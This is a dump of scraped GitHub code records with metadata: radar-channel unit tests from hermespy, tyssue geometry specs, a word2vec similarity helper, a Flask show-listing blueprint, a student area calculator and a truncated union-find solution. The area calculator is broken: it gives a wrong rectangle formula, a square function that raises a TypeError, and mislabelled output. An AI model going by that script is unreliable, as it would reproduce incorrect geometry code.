with self.assertRaises(FloatingError):\n _ = self.channel._realize_target(1, target)\n \n def test_null_hypothesis_validation(self) -> None:\n \"\"\"Null hypothesis realization should raise RuntimeError on invalid internal state\"\"\"\n \n with self.assertRaises(RuntimeError):\n self.channel.null_hypothesis(1, 1)\n \n def test_null_hypothesis(self) -> None:\n \"\"\"The radar channel null hypothesis routine should create a valid null hypothesis\"\"\"\n \n signal = Signal(self.rng.normal(size=(self.transmitter.antennas.num_transmit_antennas, 10)), self.transmitter.sampling_rate, self.transmitter.carrier_frequency)\n _ = self.channel.propagate(signal)\n \n null_hypothesis = self.channel.null_hypothesis(10, self.transmitter.sampling_rate)\n self.assertEqual(self.transmitter.antennas.num_transmit_antennas, null_hypothesis.num_transmit_streams)\n self.assertEqual(self.receiver.antennas.num_receive_antennas, null_hypothesis.num_receive_streams)\n self.assertEqual(10, null_hypothesis.num_samples)\n\n\nclass TestRadarPathRealization(unittest.TestCase):\n \"\"\"Test the radar path realization class\"\"\"\n \n def setUp(self) -> None:\n \n self.phase_shift = 1.\n self.delay = 2.\n self.doppler_shift = 3.\n self.doppler_velocity = 312.\n self.power_factor = 4.\n self.mimo_response = np.array([[[1, 2], [3, 4]]])\n self.global_position = np.array([1, 2, 3])\n self.global_velocity = np.array([0, 0, 312])\n self.static = True\n self.realization = RadarPathRealization(self.phase_shift, self.delay, self.doppler_shift, self.doppler_velocity, self.power_factor, self.mimo_response, self.global_position, self.global_velocity, self.static)\n \n def test_properties(self) -> None:\n \"\"\"Class properties should return initialization arguments\"\"\"\n \n self.assertEqual(self.phase_shift, self.realization.phase_shift)\n self.assertEqual(self.delay, self.realization.delay)\n self.assertEqual(self.doppler_shift, self.realization.doppler_shift)\n self.assertEqual(self.doppler_velocity, self.realization.doppler_velocity)\n self.assertEqual(self.power_factor, self.realization.power_factor)\n assert_array_equal(self.mimo_response, self.realization.mimo_response)\n assert_array_equal(self.global_position, self.realization.global_position)\n 
assert_array_equal(self.global_velocity, self.realization.global_velocity)\n self.assertEqual(self.static, self.realization.static)\n\n\nclass TestSingleTargetRadarChannelRealization(unittest.TestCase):\n \"\"\"Test the single target radar channel realization class\"\"\"\n \n def setUp(self) -> None:\n \n self.device = SimulatedDevice(carrier_frequency=1e9, antennas=UniformArray(IdealAntenna, .01, (2, 1, 1)))\n self.channel = SingleTargetRadarChannel(1., 1.)\n self.channel.transmitter = self.device\n self.channel.receiver = self.device\n \n self.gain = 2.\n self.target_realization = RadarTargetRealization(1., 2., 3., 4., 5., np.array([[1, 2], [3, 4]]), np.array([1, 2, 3]), np.array([0, 0, 4.]))\n self.num_samples = 10\n self.sampling_rate = 1.234\n \n self.realization = SingleTargetRadarChannelRealization(self.channel, self.gain, self.target_realization, self.num_samples, self.sampling_rate)\n\n def test_properties(self) -> None:\n \"\"\"Class properties should return initialization arguments\"\"\"\n \n self.assertEqual(self.gain, self.realization.gain)\n self.assertIs(self.target_realization, self.realization.target_realization)\n\n def test_null_hypothesis(self) -> None:\n \"\"\"Null hypothesis realization should generate correct channel realization\"\"\"\n \n null_realization = self.realization.null_hypothesis(10, 1e8)\n \n self.assertIsInstance(null_realization, SingleTargetRadarChannelRealization)\n\n def test_ground_trutch(self) -> None:\n \"\"\"Ground truth should return correct information\"\"\"\n \n assert_array_equal(np.array([[1, 2, 3]]), self.realization.ground_truth())\n\n\nclass TestMultiTargetRadarChannelRealization(unittest.TestCase):\n \"\"\"Test the multi target radar channel realization class\"\"\"\n \n def setUp(self) -> None:\n \n self.device = SimulatedDevice(carrier_frequency=1e9, antennas=UniformArray(IdealAntenna, .01, (2, 1, 1)))\n self.channel = SingleTargetRadarChannel(1., 1.)\n self.channel.transmitter = self.device\n self.channel.receiver = self.device\n \n self.gain = 2.\n self.target_realization = RadarTargetRealization(1., 2., 3., 4., 5., np.array([[1, 2], [3, 4]]), np.array([0, 1, 2]), np.array([1, 2, 3]))\n self.interference_realization = RadarInterferenceRealization(1., 2., 3., 4., 5., np.array([[2, 5], [1, 3]]), np.array([0, 1, 2]), np.array([4, 5, 6]))\n self.num_samples = 10\n self.sampling_rate = 1.234\n \n self.realization = MultiTargetRadarChannelRealization(self.channel, self.gain, self.interference_realization, [self.target_realization], self.num_samples, self.sampling_rate)\n\n def test_properties(self) -> None:\n \"\"\"Class properties should return initialization arguments\"\"\"\n \n self.assertEqual(self.gain, self.realization.gain)\n self.assertIs(self.interference_realization, self.realization.interference_realization)\n self.assertSequenceEqual([self.target_realization], self.realization.target_realizations)\n\n def test_null_hypothesis(self) -> None:\n \"\"\"Null hypothesis realization should generate correct channel realization\"\"\"\n \n null_realization = self.realization.null_hypothesis(self.num_samples, self.sampling_rate)\n \n self.assertIsInstance(null_realization, MultiTargetRadarChannelRealization)\n \n def test_ground_trutch(self) -> None:\n \"\"\"Ground truth should return correct information\"\"\"\n \n assert_array_equal(np.array([[0, 1, 2]]), self.realization.ground_truth())\n\n\nclass TestMultiTargetRadarChannel(unittest.TestCase):\n \n def setUp(self) -> None:\n \n self.carrier_frequency = 1e9\n self.transmitter = 
SimulatedDevice(carrier_frequency=self.carrier_frequency, pose=Transformation.From_Translation(np.array([0, 0, 0], dtype=float)))\n self.receiver = SimulatedDevice(carrier_frequency=self.carrier_frequency, pose=Transformation.From_Translation(np.array([20, 0, 0], dtype=float)))\n \n self.first_target = VirtualRadarTarget(FixedCrossSection(1.), velocity=np.array([10, 0, 0]), pose=Transformation.From_Translation(np.array([-10, 0, 0], dtype=float)))\n self.second_target = VirtualRadarTarget(FixedCrossSection(1.), velocity=np.array([-10, 0, 0]), pose=Transformation.From_Translation(np.array([10, 0, 0], dtype=float)))\n self.channel = MultiTargetRadarChannel(transmitter=self.transmitter, receiver=self.receiver)\n self.channel.add_target(self.first_target)\n self.channel.add_target(self.second_target)\n\n def test_add_virtual_target(self) -> None:\n \"\"\"Test adding a new virtual radar target to the channel\"\"\"\n \n target = VirtualRadarTarget(FixedCrossSection(1.))\n self.channel.add_target(target)\n \n self.assertTrue(target in self.channel.targets)\n \n def test_add_physical_target(self) -> None:\n \"\"\"Test adding a new physical radar target to the channel\"\"\"\n \n target = PhysicalRadarTarget(FixedCrossSection(1.), SimulatedDevice())\n self.channel.add_target(target)\n \n self.assertTrue(target in self.channel.targets)\n\n def test_make_target(self) -> None:\n \"\"\"Test declaring a moveable as a radar target\"\"\"\n \n moveable = Moveable()\n cross_section = FixedCrossSection(1.1234)\n new_target = self.channel.make_target(moveable, cross_section)\n \n self.assertCountEqual([self.first_target, self.second_target, new_target], self.channel.targets)\n \n def test_realize_interference_validation(self) -> None:\n \"\"\"Interference realization subroutine should raise errors on invalid parameters and states\"\"\"\n \n with self.assertRaises(ValueError):\n self.channel._realize_interference(0.)\n \n with self.assertRaises(FloatingError):\n MultiTargetRadarChannel()._realize_interference(1.2345)\n \n self.transmitter.pose.translation = np.zeros(3)\n self.receiver.pose.translation = np.zeros(3)\n \n with self.assertRaises(RuntimeError):\n self.channel._realize_interference(1.234)\n \n def test_realize_interference_monostatic(self) -> None:\n \"\"\"Realization should not realize self-interference\"\"\"\n \n self.channel.receiver = self.channel.transmitter\n self.assertIsNone(self.channel._realize_interference(1.234))\n \n def test_realize_validation(self) -> None:\n \"\"\"Realization should raise FloatingError if devices aren't specified\"\"\"\n \n with self.assertRaises(FloatingError):\n MultiTargetRadarChannel().realize(1, 1.)\n\n def test_siso_realize(self) -> None:\n \"\"\"Test SISO channel realization\"\"\"\n \n realization = self.channel.realize(200, 1e8)\n \n self.assertEqual(2, len(realization.target_realizations))\n \n self.assertEqual(1, realization.num_receive_streams)\n self.assertEqual(1, realization.num_transmit_streams)\n self.assertEqual(200, realization.num_samples)\n \n def test_mimo_realize(self) -> None:\n \"\"\"Test MIMO channel realization\"\"\"\n \n antenna_spacing = .5 * self.transmitter.wavelength\n self.transmitter.antennas = UniformArray(IdealAntenna, antenna_spacing, (2, 2, 1))\n self.receiver.antennas = UniformArray(IdealAntenna, antenna_spacing, (2, 2, 1))\n \n realization = self.channel.realize(200, 1e8)\n \n self.assertEqual(2, len(realization.target_realizations))\n \n self.assertEqual(4, realization.num_receive_streams)\n self.assertEqual(4, 
realization.num_transmit_streams)\n self.assertEqual(200, realization.num_samples)\n\n def test_null_hypothesis(self) -> None:\n \"\"\"Test the null hypothesis realization routine\"\"\"\n \n num_samples = 200\n sampling_rate = 1e8\n one_hypothesis = self.channel.realize(num_samples, sampling_rate)\n null_hypothesis = self.channel.null_hypothesis(num_samples, sampling_rate, one_hypothesis)\n \n self.assertEqual(1, null_hypothesis.num_receive_streams)\n self.assertEqual(1, null_hypothesis.num_transmit_streams)\n self.assertEqual(200, null_hypothesis.num_samples)\n self.assertEqual(0, len(null_hypothesis.target_realizations))\n self.assertAlmostEqual(0., float(np.linalg.norm(null_hypothesis.state)))\n \n def test_null_hypothesis_static(self) -> None:\n \"\"\"Test the null hypothesis realization routine including a static target\"\"\"\n \n static_target = VirtualRadarTarget(FixedCrossSection(1.), pose=Transformation.From_Translation(np.array([10, 10, 10])), static=True)\n self.channel.add_target(static_target)\n \n num_samples = 200\n sampling_rate = 1e8\n one_hypothesis = self.channel.realize(num_samples, sampling_rate)\n null_hypothesis = self.channel.null_hypothesis(num_samples, sampling_rate, one_hypothesis)\n \n self.assertEqual(1, null_hypothesis.num_receive_streams)\n self.assertEqual(1, null_hypothesis.num_transmit_streams)\n self.assertEqual(num_samples, null_hypothesis.num_samples)\n self.assertEqual(1, len(null_hypothesis.target_realizations))\n self.assertLess(0., float(np.linalg.norm(null_hypothesis.state)))\n \n def test_serialization(self) -> None:\n \"\"\"Test YAML serialization\"\"\"\n \n with patch('hermespy.channel.Channel.transmitter', new_callable=PropertyMock) as transmitter_mock, \\\n patch('hermespy.channel.Channel.receiver', new_callable=PropertyMock) as receiver_mock, \\\n patch('hermespy.channel.Channel.random_mother', new_callable=PropertyMock) as random_mock:\n \n transmitter_mock.return_value = None\n receiver_mock.return_value = None\n random_mock.return_value = None\n \n test_yaml_roundtrip_serialization(self, self.channel)\n\n\nclass TestSingleTargetRadarChannel(unittest.TestCase):\n\n def setUp(self) -> None:\n\n self.range = 100.\n self.radar_cross_section = 1.\n\n self.random_generator = default_rng(42)\n self.random_node = Mock()\n self.random_node._rng = self.random_generator\n\n self.transmitter = SimulatedDevice(carrier_frequency=1e9, sampling_rate=1e6)\n self.receiver = self.transmitter\n\n self.target_exists = True\n self.channel = SingleTargetRadarChannel(self.range, self.radar_cross_section,\n transmitter=self.transmitter,\n receiver=self.receiver,\n target_exists=self.target_exists)\n self.channel.random_mother = self.random_node\n\n self.expected_delay = 2 * self.range / speed_of_light\n\n def test_init(self) -> None:\n \"\"\"The object initialization should properly store all parameters\"\"\"\n\n self.assertEqual(self.range, self.channel.target_range)\n self.assertIs(self.radar_cross_section, self.channel.radar_cross_section)\n self.assertIs(self.transmitter, self.channel.transmitter)\n self.assertIs(self.receiver, self.channel.receiver)\n self.assertIs(self.target_exists, self.channel.target_exists)\n\n def test_target_range_setget(self) -> None:\n \"\"\"Target range property getter should return setter argument\"\"\"\n\n new_range = 500\n self.channel.target_range = new_range\n\n self.assertEqual(new_range, self.channel.target_range)\n\n def test_target_range_validation(self) -> None:\n \"\"\"Target range property setter should raise ValueError 
on invalid arguments\"\"\"\n\n with self.assertRaises(ValueError):\n self.channel.target_range = -1.\n \n with self.assertRaises(ValueError):\n self.channel.target_range = (1, 2, 3)\n \n with self.assertRaises(ValueError):\n self.channel.target_range = (3, 2)\n \n with self.assertRaises(ValueError):\n self.channel.target_range = (-1, 0)\n \n with self.assertRaises(ValueError):\n self.channel.target_range = 'wrong argument type'\n\n def test_target_exists_setget(self) -> None:\n \"\"\"Target exists flag getter should return setter argument\"\"\"\n\n new_target_exists = False\n self.channel.target_exists = new_target_exists\n self.assertEqual(new_target_exists, self.channel.target_exists)\n\n def test_radar_cross_section_get(self) -> None:\n \"\"\"Radar cross section getter should return init param\"\"\"\n\n self.assertEqual(self.radar_cross_section, self.channel.radar_cross_section)\n\n def test_cross_section_validation(self) -> None:\n \"\"\"Radar cross section property should raise ValueError on arguments smaller than zero\"\"\"\n\n with self.assertRaises(ValueError):\n self.channel.radar_cross_section = -1.12345\n\n try:\n self.channel.radar_cross_section = 0.\n\n except ValueError:\n self.fail()\n\n def test_velocity_setget(self) -> None:\n \"\"\"Velocity getter should return setter argument\"\"\"\n\n new_velocity = 20\n\n self.channel.target_velocity = new_velocity\n self.assertEqual(new_velocity, self.channel.target_velocity)\n\n def test_realize_anchored_validation(self) -> None:\n \"\"\"Impulse response should raise FloatingError if not anchored to a device\"\"\"\n\n with patch.object(RadarChannelBase, 'transmitter', None), self.assertRaises(FloatingError):\n _ = self.channel.realize(0, 1.)\n\n def test_realize_carrier_frequency_validation(self) -> None:\n \"\"\"Impulse response should raise ValueError if device carrier frequencies are less than or equal to zero\"\"\"\n\n self.transmitter.carrier_frequency = 0.\n\n with self.assertRaises(ValueError):\n _ = self.channel.realize(0, 1.)\n\n def test_realize_interference_validation(self) -> None:\n \"\"\"Impulse response should raise RuntimeError if not configured as a self-interference channel\"\"\"\n\n with patch.object(SingleTargetRadarChannel, 'receiver', None), self.assertRaises(RuntimeError):\n _ = self.channel.realize(0, 1.)\n\n def _create_impulse_train(self, interval_in_samples: int, number_of_pulses: int):\n\n interval = interval_in_samples / self.transmitter.sampling_rate\n\n number_of_samples = int(np.ceil(interval * self.transmitter.sampling_rate * number_of_pulses))\n output_signal = np.zeros((1, number_of_samples), dtype=complex)\n\n interval_in_samples = int(np.around(interval * self.transmitter.sampling_rate))\n\n output_signal[:, :number_of_samples:interval_in_samples] = 1.0\n\n return output_signal\n\n def test_propagation_delay_integer_num_samples(self) -> None:\n \"\"\"\n Test if the received signal corresponds to the expected delayed version, given that the delay is a multiple\n of the sampling interval\n \"\"\"\n\n samples_per_symbol = 1000\n num_pulses = 10\n delay_in_samples = 507\n\n input_signal = self._create_impulse_train(samples_per_symbol, num_pulses)\n\n expected_range = speed_of_light * delay_in_samples / self.transmitter.sampling_rate / 2\n expected_amplitude = ((speed_of_light / self.transmitter.carrier_frequency) ** 2 *\n self.radar_cross_section / (4 * pi) ** 3 / expected_range ** 4)\n\n self.channel.target_range = expected_range\n\n output, _, _ = self.channel.propagate(Signal(input_signal, 
self.transmitter.sampling_rate))\n\n expected_output = np.hstack((np.zeros((1, delay_in_samples)), input_signal)) * expected_amplitude\n assert_array_almost_equal(abs(expected_output), np.abs(output[0].samples[:, :expected_output.size]))\n\n def test_propagation_delay_noninteger_num_samples(self) -> None:\n \"\"\"\n Test if the received signal corresponds to the expected delayed version, given that the delay falls in the\n middle of two sampling instants.\n \"\"\"\n samples_per_symbol = 800\n num_pulses = 20\n delay_in_samples = 312\n\n input_signal = self._create_impulse_train(samples_per_symbol, num_pulses)\n\n expected_range = speed_of_light * (delay_in_samples + .5) / self.transmitter.sampling_rate / 2\n expected_amplitude = ((speed_of_light / self.transmitter.carrier_frequency) ** 2 *\n self.radar_cross_section / (4 * pi) ** 3 / expected_range ** 4)\n\n self.channel.target_range = expected_range\n\n output, _, _ = self.channel.propagate(Signal(input_signal, self.transmitter.sampling_rate))\n\n straddle_loss = np.sinc(.5)\n peaks = np.abs(output[0].samples[:, delay_in_samples:input_signal.size:samples_per_symbol])\n\n assert_array_almost_equal(peaks, expected_amplitude * straddle_loss * np.ones(peaks.shape))\n\n def test_propagation_delay_doppler(self) -> None:\n \"\"\"\n Test if the received signal corresponds to the expected delayed version, given time-variant delays on account of\n movement\n \"\"\"\n\n samples_per_symbol = 50\n num_pulses = 100\n initial_delay_in_samples = 1000\n expected_range = speed_of_light * initial_delay_in_samples / self.transmitter.sampling_rate / 2\n velocity = 10\n expected_amplitude = ((speed_of_light / self.transmitter.carrier_frequency) ** 2 *\n self.radar_cross_section / (4 * pi) ** 3 / expected_range ** 4)\n\n initial_delay = initial_delay_in_samples / self.transmitter.sampling_rate\n\n timestamps_impulses = np.arange(num_pulses) * samples_per_symbol / self.transmitter.sampling_rate\n traveled_distances = velocity * timestamps_impulses\n delays = initial_delay + 2 * traveled_distances / speed_of_light\n expected_peaks = timestamps_impulses + delays\n peaks_in_samples = np.around(expected_peaks * self.transmitter.sampling_rate).astype(int)\n straddle_delay = expected_peaks - peaks_in_samples / self.transmitter.sampling_rate\n relative_straddle_delay = straddle_delay * self.transmitter.sampling_rate\n expected_straddle_amplitude = np.sinc(relative_straddle_delay) * expected_amplitude\n\n input_signal = self._create_impulse_train(samples_per_symbol, num_pulses)\n\n self.channel.target_range = expected_range\n self.channel.target_velocity = velocity\n\n output, _, _ = self.channel.propagate(Signal(input_signal, self.transmitter.sampling_rate))\n\n assert_array_almost_equal(np.abs(output[0].samples[0, peaks_in_samples].flatten()), expected_straddle_amplitude)\n\n def test_doppler_shift(self) -> None:\n \"\"\"\n Test if the received signal corresponds to a frequency-shifted version of the transmitted signal with the\n expected Doppler shift\n \"\"\"\n\n velocity = 100\n self.channel.target_velocity = velocity\n\n num_samples = 100000\n sinewave_frequency = .25 * self.transmitter.sampling_rate\n doppler_shift = 2 * velocity / speed_of_light * self.transmitter.carrier_frequency\n\n time = np.arange(num_samples) / self.transmitter.sampling_rate\n\n input_signal = np.sin(2 * np.pi * sinewave_frequency * time)\n output, _, _ = self.channel.propagate(Signal(input_signal[np.newaxis, :], self.transmitter.sampling_rate))\n\n input_freq = np.fft.fft(input_signal)\n 
output_freq = np.fft.fft(output[0].samples.flatten()[-num_samples:])\n\n freq_resolution = self.transmitter.sampling_rate / num_samples\n\n freq_in = np.argmax(np.abs(input_freq[:int(num_samples/2)])) * freq_resolution\n freq_out = np.argmax(np.abs(output_freq[:int(num_samples/2)])) * freq_resolution\n\n self.assertAlmostEqual(freq_out - freq_in, doppler_shift, delta=np.abs(doppler_shift)*.01)\n\n def test_no_echo(self) -> None:\n \"\"\"Test if no echoes are observed if target_exists flag is disabled\"\"\"\n \n samples_per_symbol = 500\n num_pulses = 15\n\n input_signal = self._create_impulse_train(samples_per_symbol, num_pulses)\n\n self.channel.target_exists = False\n output, _, _ = self.channel.propagate(Signal(input_signal, self.transmitter.sampling_rate))\n\n assert_array_almost_equal(output[0].samples, np.zeros(output[0].samples.shape))\n\n def test_no_attenuation(self) -> None:\n \"\"\"Make sure the signal energy is preserved when the attenuate flag is disabled\"\"\"\n\n self.channel.attenuate = False\n self.channel.target_range = 10.\n\n input_signal = Signal(self._create_impulse_train(500, 15), self.transmitter.sampling_rate)\n output, _, _ = self.channel.propagate(input_signal)\n\n assert_array_almost_equal(input_signal.energy, output[0].energy, 1)\n\n def test_serialization(self) -> None:\n \"\"\"Test YAML serialization\"\"\"\n \n with patch('hermespy.channel.Channel.transmitter', new_callable=PropertyMock) as transmitter_mock, \\\n patch('hermespy.channel.Channel.receiver', new_callable=PropertyMock) as receiver_mock, \\\n patch('hermespy.channel.Channel.random_mother', new_callable=PropertyMock) as random_mock:\n \n transmitter_mock.return_value = None\n receiver_mock.return_value = None\n random_mock.return_value = None\n \n test_yaml_roundtrip_serialization(self, self.channel)\n","repo_name":"Barkhausen-Institut/hermespy","sub_path":"tests/unit_tests/channel/test_radar_channel.py","file_name":"test_radar_channel.py","file_ext":"py","file_size_in_byte":34977,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"61"} +{"seq_id":"23835685338","text":"def planar_sheet():\n \"\"\"\n Specification for a 2D sheet in the plane\n \"\"\"\n spec = {\n \"edge\": {\n \"trgt\": 0,\n \"nz\": 1.0,\n \"length\": 1.0,\n \"face\": 0,\n \"srce\": 0,\n \"dx\": 0.0,\n \"dy\": 0.0,\n \"sx\": 0.0,\n \"sy\": 0.0,\n \"tx\": 0.0,\n \"ty\": 0.0,\n \"fx\": 0.0,\n \"fy\": 0.0,\n },\n \"vert\": {\"y\": 0.0, \"is_active\": 1, \"x\": 0.0},\n \"face\": {\n \"y\": 0.0,\n \"is_alive\": 1,\n \"perimeter\": 0.0,\n \"area\": 0.0,\n \"x\": 0.0,\n \"num_sides\": 6,\n \"id\": 0,\n },\n \"settings\": {\"geometry\": \"planar\"},\n }\n return spec\n\n\ndef planar_spec():\n return planar_sheet()\n\n\ndef planar_periodic_sheet():\n spec = planar_sheet()\n spec[\"settings\"] = {\"boundaries\": {\"x\": [-1, 1], \"y\": [-1, 1]}}\n return spec\n\n\ndef sheet_spec():\n\n spec = {\n \"face\": {\n \"x\": 0.0,\n \"y\": 0.0,\n \"z\": 0.0,\n \"num_sides\": 6,\n \"area\": 1.0,\n \"perimeter\": 1.0,\n \"is_alive\": 1,\n \"id\": 0,\n },\n \"vert\": {\n \"x\": 0.0,\n \"y\": 0.0,\n \"z\": 0.0,\n \"is_active\": 1,\n \"rho\": 0.0,\n \"height\": 0.0,\n \"basal_shift\": 4.0,\n },\n \"edge\": {\n \"srce\": 0,\n \"trgt\": 0,\n \"face\": 0,\n \"dx\": 0.0,\n \"dy\": 0.0,\n \"dz\": 0.0,\n \"nx\": 0.0,\n \"ny\": 0.0,\n \"nz\": 1.0,\n \"sx\": 0.0,\n \"sy\": 0.0,\n \"sz\": 0.0,\n \"tx\": 0.0,\n \"ty\": 0.0,\n \"tz\": 0.0,\n \"fx\": 0.0,\n \"fy\": 0.0,\n \"fz\": 0.0,\n \"length\": 1.0,\n \"is_active\": 1,\n 
},\n \"settings\": {\"geometry\": \"cylindrical\", \"height_axis\": \"z\"},\n }\n return spec\n\n\ndef periodic_sheet():\n spec = planar_sheet()\n spec[\"settings\"].update({\"boundaries\": {\"x\": [-1, 1], \"y\": [-1, 1]}})\n return spec\n\n\ndef cylindrical_sheet():\n \"\"\"Geometry specification of a sheet in a 3D space.\"\"\"\n spec = sheet_spec()\n return spec\n\n\ndef rod_sheet():\n \"\"\"Geomtetry specs of a rod sheet in 3D space.\"\"\"\n spec = sheet_spec()\n spec[\"settings\"].update({\"geometry\": \"rod\", \"height_axis\": \"z\", \"ab\": [0.0, 0.0]})\n spec[\"vert\"].update({\"left_tip\": False, \"right_tip\": False})\n\n return spec\n\n\ndef flat_sheet():\n \"\"\"Geometry specification of a sheet in a 3D space.\"\"\"\n spec = sheet_spec()\n spec[\"settings\"].update({\"geometry\": \"flat\"})\n return spec\n\n\ndef spherical_sheet():\n \"\"\"Geometry specification of a sheet in a 3D space.\n\n Height is computed with respect to the distance to\n the coordinate systems center\n\n \"\"\"\n\n spec = sheet_spec()\n spec[\"settings\"].update({\"geometry\": \"spherical\"})\n return spec\n\n\ndef bulk_spec():\n \"\"\"Geometry specification for bulk tissues.\"\"\"\n spec = sheet_spec()\n\n spec[\"edge\"].update({\"cx\": 0.0, \"cy\": 0.0, \"cz\": 0.0, \"cell\": 0, \"sub_vol\": 0.0})\n\n spec[\"cell\"] = {\n \"x\": 0.0,\n \"y\": 0.0,\n \"z\": 0.0,\n \"area\": 0.0,\n \"vol\": 0.0,\n \"num_faces\": 6,\n \"is_alive\": 1,\n \"id\": 0,\n }\n return spec\n","repo_name":"DamCB/tyssue","sub_path":"tyssue/config/geometry/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"61"} +{"seq_id":"12081192465","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nfrom gensim.models import word2vec\nimport jieba\nimport numpy as np\nfrom scipy.linalg import norm\n\nclass voiceModel():\n def __init__(self):\n self.model = word2vec.Word2Vec.load('voice.model')\n\n def sentence_vector(self, s):\n words = jieba.lcut(s)\n v = np.zeros(100)\n wordLen = len(words)\n for word in words:\n try:\n temInt = self.model.wv[word]\n except Exception as e:\n wordLen -=1\n else:\n v += temInt\n v /= wordLen\n return v\n\n def vector_similarity(self, s1, s2):\n v1, v2 = self.sentence_vector(s1), self.sentence_vector(s2)\n return np.dot(v1, v2) / (norm(v1) * norm(v2))\nif __name__ == \"__main__\":\n mvoiceModel = voiceModel()\n senten1 = \"我要关闭\"\n senten2 = \"我要部署\"\n print(mvoiceModel.vector_similarity(senten1,senten2))\n","repo_name":"Wang-future/private_project","sub_path":"codeAdoc/code/audio/mVoiceModel.py","file_name":"mVoiceModel.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2997323333","text":"from flask import (\n Blueprint,\n render_template,\n flash,\n redirect,\n url_for\n)\nfrom model import Artist, db, Show, Venue\nimport sys\nfrom forms import *\nfrom model import Artist, Venue\n\nshow_blueprint = Blueprint('show_blueprint', __name__)\n\n\n# Shows\n# ----------------------------------------------------------------\n\n@show_blueprint.route('/shows')\ndef shows():\n # displays list of shows at /shows\n try:\n data = []\n\n stmt = db.session.query(Show, Venue, Artist).select_from(\n Show).join(Venue).join(Artist).all()\n\n for show, venue, artist in stmt:\n data.append({\n \"venue_id\": venue.id,\n \"venue_name\": venue.name,\n \"artist_id\": artist.id,\n \"artist_name\": artist.name,\n 
\"artist_image_link\": artist.image_link,\n \"start_time\": show.start_time\n })\n\n except BaseException:\n flash(f'An error occured, could not get all shows successfully!')\n print(sys.exc_info())\n\n return render_template('pages/shows.html', shows=data)\n\n\n@show_blueprint.route('/shows/create')\ndef create_shows():\n # renders form. do not touch.\n form = ShowForm()\n\n venues = Venue.query.all()\n artists = Artist.query.all()\n\n form.artist_id.choices = []\n form.venue_id.choices = []\n\n for venue in venues:\n form.venue_id.choices.append((venue.id, venue.name))\n\n for artist in artists:\n form.artist_id.choices.append((artist.id, artist.name))\n\n return render_template('forms/new_show.html', form=form)\n\n\n@show_blueprint.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n # called to create new shows in the db, upon submitting new show listing\n # form\n try:\n form = ShowForm()\n\n venue_id = form.venue_id.data\n artist_id = form.artist_id.data\n start_time = form.start_time.data\n\n show = Show(\n venue_id=venue_id,\n artist_id=artist_id,\n start_time=start_time)\n\n db.session.add(show)\n db.session.commit()\n # on successful db insert, flash success\n flash('Show was successfully listed!')\n except BaseException:\n # e.g., flash('An error occurred. Show could not be listed.')\n # see: http://flask.pocoo.org/docs/1.0/patterns/flashing/\n db.session.rollback()\n flash('An error occured Show was not successfully listed!')\n print(sys.exc_info())\n finally:\n db.session.close()\n\n return redirect(\n url_for('index'))\n","repo_name":"see-why/FyyerApp","sub_path":"show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4732513145","text":"#AreaCalculator\r\nimport math\r\ndef Area_Triangle():\r\n b,h=input(\"Enter Base & Height: \").split()\r\n print(\"Area Of The Triangle: \",0.5*int(b)*int(h))\r\n\r\ndef Area_Rectangle():\r\n w,h=input(\"Enter Width & Height: \").split()\r\n print(\"Area Of The Rectangle: \",0.5*int(w)*int(h))\r\n\r\ndef Area_Trapezium():\r\n a,b,h=input(\"Enter length of a,b & height: \").split()\r\n print(\"Area Of The Trapezium: \",0.5*(int(a)+int(b))*int(h))\r\n\r\ndef Area_Circle():\r\n r = input(\"Enter radius: \")\r\n print(\"Area Of The Circle: \",math.pi*float(r)*float(r))\r\n\r\ndef Area_Ellipse():\r\n b,h=input(\"Enter a & b: \").split()\r\n print(\"Area Of The Ellipse: \",math.pi*int(b)*int(h))\r\n\r\ndef Area_Square():\r\n a=input(\"Enter Length of side: \")\r\n print(\"Area Of The Triangle: \",int(a)(int(a)))\r\n\r\ndef Area_Parallelogram():\r\n b,h=input(\"Enter Base & Vertical Height: \").split()\r\n print(\"Area Of The Triangle: \",int(b)*int(h))\r\n\r\ndef Area_Sector():\r\n r,a=input(\"Enter radius and angle in radians: \").split()\r\n print(\"Area Of The Triangle: \",0.5*int(r)*int(r)*int(a))\r\n\r\nif __name__ == '__main__':\r\n\r\n print(\"Area Calculator\")\r\n print(\"---------------\")\r\n print(\"1.Triangle\\n2.Rectangle\\n3.Trapezium\\n4.Circle\\n5.Ellipse\\n6.Square\\n7.Parallelogram\\n8.Sector\\n0 to exit\")\r\n print(\"Please Enter A Number To Calculate Area:\")\r\n n = int(input())\r\n if n == 1:\r\n Area_Triangle()\r\n elif n == 2:\r\n Area_Rectangle()\r\n elif n == 3:\r\n Area_Trapezium()\r\n elif n == 4:\r\n Area_Circle()\r\n elif n == 5:\r\n Area_Ellipse()\r\n elif n == 6:\r\n Area_Square()\r\n elif n == 7:\r\n Area_Parallelogram()\r\n elif n == 8:\r\n Area_Sector()\r\n elif n 
== 0:exit()\r\n","repo_name":"SihabSahariar/BRACU-CSE","sub_path":"CSE111-Python/CSE111-Python-master/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"38065379207","text":"import sys\nsys.setrecursionlimit(10**9)\ninput = sys.stdin.readline\nt = int(input())\n\ndef solve():\n def find(x):\n if x == parent[x]:\n return x\n parent[x] = find(parent[x])\n return parent[x]\n \n \n def union(x, y):\n x = find(x)\n y = find(y)\n if x != y:\n parent[x] = y\n num[y] += num[x]\n num[x] = 1\n return num[y]\n \n \n res = []\n for _ in range(t):\n f = int(input())\n cnt = 1\n parent = [i for i in range(f*2+1)]\n num = [1]*(f*2+1)\n friend = dict()\n for _ in range(f):\n a, b = input().split()\n if a not in friend:\n friend[a] = cnt\n cnt += 1\n if b not in friend:\n friend[b] = cnt\n cnt += 1\n res.append(union(friend[a], friend[b]))\n print('\\n'.join(map(str,res)))\n\nif __name__=='__main__':\n 